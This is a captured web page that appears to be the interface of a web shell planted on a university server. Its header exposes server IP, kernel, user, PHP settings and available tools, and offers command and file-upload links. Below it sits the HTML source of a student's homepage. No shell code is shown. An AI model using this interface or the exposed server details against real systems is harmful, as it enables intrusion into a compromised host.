Server IP : 172.16.15.8 / Your IP : 18.116.43.109 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/vnlaughlin/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <title>Victoria's Page</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.0/jquery.min.js"></script> <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script> </head> <div class="container"> <body> <nav class="navbar navbar-inverse" style="background-color: ;"> <div class="container-fluid"> <div class="navbar-header"> <a class="navbar-brand" href="index.html">Victoria's Page</a> </div> <ul class="nav navbar-nav"> <li class="active"><a href="index.html">Home</a></li> <li><a href="hm_cs480.html">CS480</a></li> <li><a href="hm_project.html">Projects</a></li> <li><a href="hm_contact.html">Contact</a></li> </ul> </div> </nav> <div class="jumbotron"> <h1>Victoria Laughlin's Homepage</h1> <p>I am a computer science major (B.S) taking classes in Virginia Wesleyan College. This website is mostly a learning and a platform to show any projects I have done over the course of my education.<p> </div> </div> </body> </html>